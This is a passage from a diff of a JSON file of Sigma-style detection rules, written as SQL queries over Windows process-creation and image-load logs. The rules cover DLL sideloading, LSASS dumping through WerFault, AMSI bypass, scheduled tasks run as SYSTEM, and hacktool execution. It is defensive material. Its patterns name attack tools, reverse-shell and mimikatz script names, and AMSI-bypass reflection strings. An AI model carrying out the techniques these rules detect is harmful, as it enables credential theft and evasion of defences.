(x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName = ''))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND ((((((NewProcessName LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wget.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cipher.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\write.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%start%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.spl%' ESCAPE '\\' OR CommandLine LIKE '%route add%' ESCAPE '\\' OR CommandLine LIKE '%program files%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%add portopening%' ESCAPE '\\' OR CommandLine LIKE '%rule name%' ESCAPE '\\')))) OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%.spl%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\')))" ], - "filename": "image_load_abusing_azure_browser_sso.yml" + "filename": "proc_creation_win_spoolsv_susp_child_processes.yml" }, { - "title": "DLL Loaded From Suspicious Location Via Cmspt.EXE", - "id": "75e508f7-932d-4ebc-af77-269237a84ce1", + "title": "Schtasks Creation Or Modification With SYSTEM Privileges", + "id": "89ca78fd-b37c-4310-b3d3-81a023f83936", "status": "experimental", - "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", + "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.003" + "attack.execution", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Unikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Users\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (ImageLoaded LIKE '%.dll' ESCAPE '\\' OR ImageLoaded LIKE '%.ocx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '% /change %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\') AND CommandLine LIKE '%/ru %' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\') OR ((CommandLine LIKE '%/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR %' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Avira\\\\System Speedup\\\\setup\\\\avira\\_speedup\\_setup.exe%' ESCAPE '\\' OR CommandLine LIKE '%/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST%' ESCAPE '\\'))))" ], - "filename": "image_load_cmstp_load_dll_from_susp_location.yml" + "filename": "proc_creation_win_schtasks_system.yml" }, { - "title": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE", - "id": "ec8c4047-fad9-416a-8c81-0f479353d7f6", + "title": "Potential Credential Dumping Via WER", + "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", "status": "experimental", - "description": "Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the \"sdiageng.dll\" library", - "author": "Greg (rule)", + "description": "Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass", + "author": "@pbssubhash , Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1202", - "cve.2022.30190" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\sdiageng.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Werfault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND CommandLine LIKE '% -u -p %' ESCAPE '\\' AND CommandLine LIKE '% -ip %' ESCAPE '\\' AND CommandLine LIKE '% -s %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')))" ], - "filename": "image_load_dll_sdiageng_load_by_msdt.yml" + "filename": "proc_creation_win_werfault_lsass_shtinkering.yml" }, { - "title": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders", - "id": "6b98b92b-4f00-4f62-b4fe-4d1920215771", - "status": "experimental", - "description": "Detects DLL sideloading of system dlls that are not present on the system by default. Usually to achieve techniques such as UAC bypass and privilege escalation", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Logon Scripts (UserInitMprLogonScript)", + "id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", + "status": "test", + "description": "Detects creation or execution of UserInitMprLogonScript persistence method", + "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1037.001", + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Exclude legitimate logon scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT ((Signed = 'true' AND Signature = 'Microsoft Windows')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%UserInitMprLogonScript%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%netlogon%.bat%' ESCAPE '\\' OR CommandLine LIKE '%UsrLogon.cmd%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\WINDOWS\\\\Explorer.EXE%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\proquota.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Citrix\\\\System32\\\\icast.exe' ESCAPE '\\')))))" ], - "filename": "image_load_side_load_non_existent_dlls.yml" + "filename": "proc_creation_win_persistence_userinitmprlogonscript.yml" }, { - "title": "Potential Rcdll.DLL Sideloading", - "id": "6e78b74f-c762-4800-82ad-f66787f10c8a", - "status": "experimental", - "description": "Detects potential DLL sideloading of rcdll.dll", - "author": "X__Junior", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ], + "title": "Suspicious Program Names", + "id": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", + "status": "test", + "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate tools that accidentally match on the searched patterns" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\rcdll.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\CVE-202%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CVE202%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\poc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact\\_protected.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact32big.exe' ESCAPE '\\' OR NewProcessName LIKE '%obfuscated.exe' ESCAPE '\\' OR NewProcessName LIKE '%obfusc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\meterpreter' ESCAPE '\\') OR (CommandLine LIKE '%inject.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CVE%' ESCAPE '\\' OR CommandLine LIKE '%pupy.ps1%' ESCAPE '\\' OR CommandLine LIKE '%payload.ps1%' ESCAPE '\\' OR CommandLine LIKE '%beacon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%PowerView.ps1%' ESCAPE '\\' OR CommandLine LIKE '%bypass.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfuscated.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfusc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfus.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfs.ps1%' ESCAPE '\\' OR CommandLine LIKE '%evil.ps1%' ESCAPE '\\' OR CommandLine LIKE '%MiniDogz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\_enc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\shell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\rshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%revshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av\\_test.ps1%' ESCAPE '\\' OR CommandLine LIKE '%adrecon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PowerUp\\_%' ESCAPE '\\' OR CommandLine LIKE '%powerup.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\a.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\p.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Hound.ps1%' ESCAPE '\\' OR CommandLine LIKE '%encode.ps1%' ESCAPE '\\' OR CommandLine LIKE '%powercat.ps1%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_rcdll.yml" + "filename": "proc_creation_win_susp_progname.yml" }, { - "title": "Potential Iviewers.DLL Sideloading", - "id": "4c21b805-4dd7-469f-b47d-7383a8fcb437", - "status": "experimental", - "description": "Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", - "author": "X__Junior", + "title": "Renamed ZOHO Dctask64 Execution", + "id": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", + "status": "test", + "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + "attack.t1055.001", + "attack.t1202", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Unknown yet" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\iviewers.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Kits\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Hashes LIKE '%6834B1B94E49701D77CCB3C0895E1AFD%' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\dctask64.exe' ESCAPE '\\'))" ], - "filename": "image_load_side_load_iviewers.yml" + "filename": "proc_creation_win_renamed_dctask64.yml" }, { - "title": "Load Of Dbghelp/Dbgcore DLL From Suspicious Process", - "id": "0e277796-5f23-4e49-a490-483131d4f6e1", + "title": "Xwizard DLL Sideloading", + "id": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", "status": "test", - "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Windows installed on non-C drive" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dnx.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE 'C:\\\\WINDOWS\\\\winsxs\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\TiWorker.exe -Embedding' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" ], - "filename": "image_load_dll_dbghelp_dbgcore_susp_load.yml" + "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml" }, { - "title": "DotNET DLL Loaded Via Office Applications", - "id": "ff0f2b05-09db-4095-b96d-1b75ca24894a", + "title": "Potential AMSI Bypass Via .NET Reflection", + "id": "30edb182-aa75-42c0-b0a9-e998bb29067c", "status": "test", - "description": "Detects any assembly DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", + "author": "Markus Neis, @Kostastsale", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\assembly\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%System.Management.Automation.AmsiUtils%' ESCAPE '\\' OR CommandLine LIKE '%amsiInitFailed%' ESCAPE '\\') OR (CommandLine LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND CommandLine LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND CommandLine LIKE '%NonPublic,Static%' ESCAPE '\\')))" ], - "filename": "image_load_office_dotnet_assembly_dll_load.yml" + "filename": "proc_creation_win_powershell_amsi_init_failed_bypass.yml" }, { - "title": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32", - "id": "8cde342c-ba48-4b74-b615-172c330f2e93", - "status": "experimental", - "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Format.com FileSystem LOLBIN", + "id": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", + "status": "test", + "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.defense_evasion", - "attack.t1003.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (Hashes LIKE '%IMPHASH=eed93054cb555f3de70eaa9787f32ebb%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5e0dbdec1fce52daae251a110b4f309d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=eadbccbb324829acb5f2bbe87e5549a8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=407ca0f7b523319d758a40d7c0193699%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=281d618f4e6271e527e6386ea6f748de%' ESCAPE '\\')) AND NOT (ImageLoaded LIKE '%\\\\comsvcs.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\format.com' ESCAPE '\\' AND CommandLine LIKE '%/fs:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/fs:FAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:exFAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:NTFS%' ESCAPE '\\' OR CommandLine LIKE '%/fs:UDF%' ESCAPE '\\' OR CommandLine LIKE '%/fs:ReFS%' ESCAPE '\\'))))" ], - "filename": "image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" + "filename": "proc_creation_win_lolbin_format.yml" }, { - "title": "FoggyWeb Backdoor DLL Loading", - "id": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", - "status": "test", - "description": "Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected \"version.dll\" dll", + "title": "Droppers Exploiting CVE-2017-11882", + "id": "678eb5f4-8597-4be6-8be7-905e4234b53a", + "status": "stable", + "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ImageLoaded LIKE 'C:\\\\Windows\\\\ADFS\\\\version.dll' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\')" ], - "filename": "image_load_malware_foggyweb_nobelium.yml" + "filename": "proc_creation_win_exploit_cve_2017_11882.yml" }, { - "title": "Microsoft Defender Loading DLL from Nondefault Path", - "id": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", - "status": "experimental", - "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "title": "HackTool - Hashcat Password Cracker Execution", + "id": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", + "status": "test", + "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.credential_access", + "attack.t1110.002" ], "falsepositives": [ - "Very unlikely" + "Tools that use similar command line flags and values" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NisSrv.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\mpclient.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\hashcat.exe' ESCAPE '\\' OR (CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-m 1000 %' ESCAPE '\\' AND CommandLine LIKE '%-r %' ESCAPE '\\')))" ], - "filename": "image_load_side_load_windows_defender.yml" + "filename": "proc_creation_win_hktl_hashcat.yml" }, { - "title": "Time Travel Debugging Utility Usage - Image", - "id": "e76c8240-d68f-4773-8880-5c6f63595aaf", - "status": "test", - "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "title": "Potential RDP Tunneling Via SSH", + "id": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", + "status": "experimental", + "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Legitimate usage by software developers/testers" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdwriter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdloader.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\')" ], - "filename": "image_load_tttracer_mod_load.yml" + "filename": "proc_creation_win_ssh_rdp_tunneling.yml" }, { - "title": "Active Directory Kerberos DLL Loaded Via Office Applications", - "id": "7417e29e-c2e7-4cf6-a2e8-767228c64837", - "status": "test", - "description": "Detects Kerberos DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", + "id": "a7c3d773-caef-227e-a7e7-c2f13c622329", + "status": "experimental", + "description": "Detects attackers using tooling with bad opsec defaults.\nE.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n", + "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\kerberos.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND CommandLine LIKE '%WerFault.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvcs.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' AND CommandLine LIKE '%regasm.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvr32.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\')))" ], - "filename": "image_load_office_kerberos_dll_load.yml" + "filename": "proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" }, { - "title": "DLL Sideloading Of DBGCORE.DLL", - "id": "9ca2bf31-0570-44d8-a543-534c47c33ed7", - "status": "experimental", - "description": "Detects DLL sideloading of \"dbgcore.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", - "tags": [ - "attack.defense_evasion", - "attack.persistence", - 